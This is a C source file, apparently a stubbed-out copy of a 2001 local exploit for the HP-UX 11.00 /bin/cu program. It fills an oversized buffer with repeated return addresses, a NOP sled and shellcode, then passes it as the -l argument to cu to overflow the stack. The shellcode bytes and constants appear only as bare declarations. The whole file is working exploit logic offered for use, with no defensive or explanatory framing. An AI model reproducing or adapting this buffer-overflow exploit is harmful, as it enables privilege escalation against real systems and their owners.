
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 char HPPA_NOP ;
 int LEN ;
 int OFFSET ;
 long RET ;
 int atoi (char*) ;
 int execl (char*,char*,char*,char*,int ) ;
 int fprintf (int ,char*,...) ;
 char* hppa_shellcode ;
 int memcpy (char*,char*,int) ;
 int stderr ;
 int strlen (char*) ;

int
main(int argc , char **argv){
  char buffer[LEN+8];
  int i;
  long retaddr = RET;
  int offset = OFFSET;

  if(argc>1) offset = atoi(argv[1]);
    for (i=0;i<LEN;i+=4)
      *(long *)&buffer[i] = retaddr + offset;

  for (i=0;i<(LEN-strlen(hppa_shellcode)-50);i++)
    *(buffer+i) = HPPA_NOP;

  memcpy(buffer+i,hppa_shellcode,strlen(hppa_shellcode));
  fprintf(stderr, "HP-UX 11.00 /bin/cu exploit\n");
  fprintf(stderr, "Copyright (c) 2001 Zorgon\n");
  fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", retaddr + offset, offset, strlen(buffer));

  execl("/bin/cu","cu","-l",buffer,0);
}
